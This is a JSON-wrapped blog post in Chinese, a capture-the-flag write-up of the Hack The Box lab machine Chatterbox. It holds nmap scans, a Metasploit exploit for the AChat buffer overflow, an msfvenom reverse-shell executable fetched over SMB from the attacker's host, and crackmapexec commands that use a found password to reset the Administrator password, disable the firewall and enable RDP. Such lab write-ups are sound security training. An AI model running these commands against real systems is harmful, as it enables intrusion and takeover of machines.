{"id":187,"date":"2024-11-13T11:00:09","date_gmt":"2024-11-13T03:00:09","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=187"},"modified":"2024-11-13T11:00:10","modified_gmt":"2024-11-13T03:00:10","slug":"187","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/187\/","title":{"rendered":"HTB\u9776\u673a Chatterbox \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.74<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.74 (10.10.10.74) 56(84) bytes of data.\n64 bytes from 10.10.10.74: icmp_seq=1 ttl=127 time=109 ms\n64 bytes from 10.10.10.74: icmp_seq=2 ttl=127 time=109 ms\n64 bytes from 10.10.10.74: icmp_seq=4 ttl=127 time=110 ms\n\n--- 10.10.10.74 ping statistics ---\n4 packets transmitted, 3 received, 25% packet loss, time 3331ms\nrtt min\/avg\/max\/mdev = 108.901\/109.207\/109.810\/0.425 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7684\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Oct 16 16:59:42 2024 as: nmap -sF -p- --min-rate 4000 -oN .\/fin_result.txt 10.10.10.74\nNmap scan report for 10.10.10.74\nHost is up (0.11s latency).\nAll 65535 scanned ports on 10.10.10.74 are in ignored states.\nNot shown: 65535 closed tcp ports (reset)\n\n# Nmap done at Wed Oct 16 17:00:06 2024 -- 1 IP address (1 host up) scanned in 23.97 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u786e\u5b9a\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Oct 16 17:03:41 2024 as: nmap -sS -sV -A -p- --min-rate 4000 -oN .\/tcp_result.txt 10.10.10.74\nNmap scan report for 10.10.10.74\nHost is up (0.11s latency).\nNot shown: 65524 closed tcp ports (reset)\nPORT      STATE SERVICE      VERSION\n135\/tcp   open  msrpc        Microsoft Windows RPC\n139\/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n9255\/tcp  open  http         AChat chat system httpd\n|_http-server-header: AChat\n|_http-title: Site doesn't have a title.\n9256\/tcp  open  achat        AChat chat system\n49152\/tcp open  msrpc        Microsoft Windows RPC\n49153\/tcp open  msrpc        Microsoft Windows RPC\n49154\/tcp open  msrpc        Microsoft Windows RPC\n49155\/tcp open  msrpc        Microsoft Windows RPC\n49156\/tcp open  msrpc        Microsoft Windows RPC\n49157\/tcp open  msrpc        Microsoft Windows RPC\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.94SVN%E=4%D=10\/16%OT=135%CT=1%CU=37011%PV=Y%DS=2%DC=T%G=Y%TM=67\nOS:0F81E8%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S\nOS:%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O\nOS:5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6\nOS:=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%D\nOS:F=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=\nOS:%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%\nOS:W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=\nOS:)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%\nOS:DFI=N%T=80%CD=Z)\n\nNetwork Distance: 2 hops\nService Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 6h08m13s, deviation: 2h18m35s, median: 4h48m12s\n| smb-os-discovery: \n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n|   Computer name: Chatterbox\n|   NetBIOS computer name: CHATTERBOXx00\n|   Workgroup: WORKGROUPx00\n|_  System time: 2024-10-16T09:53:46-04:00\n| smb2-security-mode: \n|   2:1:0: \n|_    Message signing enabled but not required\n| smb-security-mode: \n|   account_used: &lt;blank&gt;\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-time: \n|   date: 2024-10-16T13:53:47\n|_  start_date: 2024-10-16T13:26:12\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   107.29 ms 10.10.14.1\n2   106.87 ms 10.10.10.74\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Wed Oct 16 17:05:44 2024 -- 1 IP address (1 host up) scanned in 123.28 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Oct 16 17:12:03 2024 as: nmap -sU -p- --min-rate 4000 -oN .\/udp_ports.txt 10.10.10.74\nWarning: 10.10.10.74 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.74\nHost is up (0.12s latency).\nAll 65535 scanned ports on 10.10.10.74 are in ignored states.\nNot shown: 65364 open|filtered udp ports (no-response), 171 closed udp ports (port-unreach)\n\n# Nmap done at Wed Oct 16 17:15:08 2024 -- 1 IP address (1 host up) scanned in 185.04 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u7591\u4f3c\u4e3a<code>Windows 7<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>AChat\u670d\u52a1\uff089255\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u6d4f\u89c8\u5668\u8bbf\u95ee\u9776\u673a<code>9255<\/code>\u7aef\u53e3\uff0c\u5931\u8d25\uff0c\u76f4\u63a5\u8054\u7f51\u641c\u7d22<code>AChat<\/code>\u6f0f\u6d1e\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729127571753-a964e226-bcff-4e89-a1c6-0c4437e6533d.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u67e5\u627e\u5230\u4e00\u4e2a\u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2015-1578<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>AChat\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u542f\u52a8<code>Metasploit<\/code>\uff0c\u641c\u7d22<code>achat<\/code>\uff0c\u53d1\u73b0\u4e00\u4e2a\u653b\u51fb\u6a21\u5757\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729210510770-f6e2403e-4138-4530-a826-dc9a134dd5d6.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u4f7f\u7528\u8be5\u6a21\u5757\u8fdb\u884c\u653b\u51fb\uff0c\u8fd9\u91cc\u9700\u8981\u4f7f\u7528\u8f7d\u8377<code>windows\/shell\/reverse_tcp_allports<\/code>\uff0c\u5426\u5219\u65e0\u6cd5\u5c06ShellCode\u8fdb\u884c\u7f16\u7801\uff1a<\/p>\n<pre><code class=\"language-shell\">use 0\nset payload windows\/shell\/reverse_tcp_allports\nset RHOSTS 10.10.10.74\nset LHOST 10.10.14.3\nrun<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729210745697-192e8237-6195-4dd2-8b3f-2304ede4be03.png\" alt=\"\" \/><\/p>\n<p>\u63a5\u4e0b\u6765\u76f4\u63a5\u6267\u884c<code>run<\/code>\u547d\u4ee4\u8fdb\u884c\u653b\u51fb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729210856842-d7fa4e71-488d-47a2-99f8-b2e0d4deaad3.png\" alt=\"\" \/><\/p>\n<p>\u4e3a\u4e86\u83b7\u53d6\u7a33\u5b9a\u7684<code>PowerShell<\/code>\u53cd\u5f39\uff0c\u6211\u4eec\u9700\u8981\u5728\u672c\u5730\u751f\u6210\u4e00\u4e2a\u53cd\u5f39PowerShell\u7684\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-shell\">msfvenom -p windows\/powershell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f exe -o reverse443.exe<\/code><\/pre>\n<p>\u968f\u540e\u5728\u9776\u673a\u4e0a\u6267\u884c\u5982\u4e0b\u547d\u4ee4\uff0c\u901a\u8fc7<code>SMB<\/code>\u8fde\u63a5\u5c06\u53cd\u5f39\u7a0b\u5e8f\u4e0a\u4f20\u5230\u9776\u673a\u5e76\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-shell\">net use Z: \\\\10.10.14.3\\pentest_notes\\chatterbox ********* \/user:megumin\ncopy Z:\\reverse443.exe C:\\Users\\Public\\reverse443.exe\nC:\\Users\\Public\\reverse443.exe<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729211079998-cd234d3a-f814-4702-b616-a71d43626a4f.png\" alt=\"\" \/><\/p>\n<p><strong>\u53cd\u5f39PowerShell\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u81ea\u52a8\u767b\u5f55\u51ed\u636e\u5229\u7528<\/h2>\n<p>\u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u4f7f\u7528<code>WinPEAS<\/code>\u5de5\u5177\u5bf9\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u8fdb\u884c\u672c\u5730\u4fe1\u606f\u6536\u96c6\uff0c\u53d1\u73b0\u7528\u6237<code>Alfred<\/code>\u4f7f\u7528\u4e86\u81ea\u52a8\u767b\u5f55\u529f\u80fd\uff0c\u5e76\u4e14\u53ef\u4ee5\u53d1\u73b0\u5bc6\u7801\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729215312613-29d9b505-8d6c-443d-9df5-ae88a49741f3.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u5c06<code>Alfred<\/code>\u7684\u5bc6\u7801\u4f5c\u4e3a<code>Administrator<\/code>\u7528\u6237\u7684\u5bc6\u7801\uff0c\u901a\u8fc7<code>Windows SMB<\/code>\u670d\u52a1\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb 10.10.10.74 -u Administrator -p \"Welcome1!\" -x \"whoami \/all\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729215547497-bc0e5f71-ba82-4f50-a5c1-4acfd835611d.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01\u63a5\u4e0b\u6765\u76f4\u63a5\u4fee\u6539<\/strong><code>**Administrator**<\/code><strong>\u5bc6\u7801\u3001\u5173\u95ed\u9632\u706b\u5899\u5e76\u6253\u5f00<\/strong><code>**RDP**<\/code><strong>\u670d\u52a1\uff1a<\/strong><\/p>\n<pre><code class=\"language-shell\">crackmapexec smb 10.10.10.74 -u Administrator -p \"Welcome1!\" -x \"net user Administrator *********\"\ncrackmapexec smb 10.10.10.74 -u Administrator -p \"*********\" -x \"netsh advfirewall set allprofiles state off\"\ncrackmapexec smb 10.10.10.74 -u Administrator -p \"*********\" -x \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729215964284-73244538-d8ae-45f3-8928-042c5c4799b7.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u4f7f\u7528<code>rdesktop<\/code>\u767b\u5f55\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-shell\">rdesktop 10.10.10.74 -p 3389<\/code><\/pre>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729216242940-44382b09-df41-4827-8f37-f599b54a2c57.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.74 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.74 (10.10.10.74)  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-187","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=187"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/187\/revisions"}],"predecessor-version":[{"id":188,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/187\/revisions\/188"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}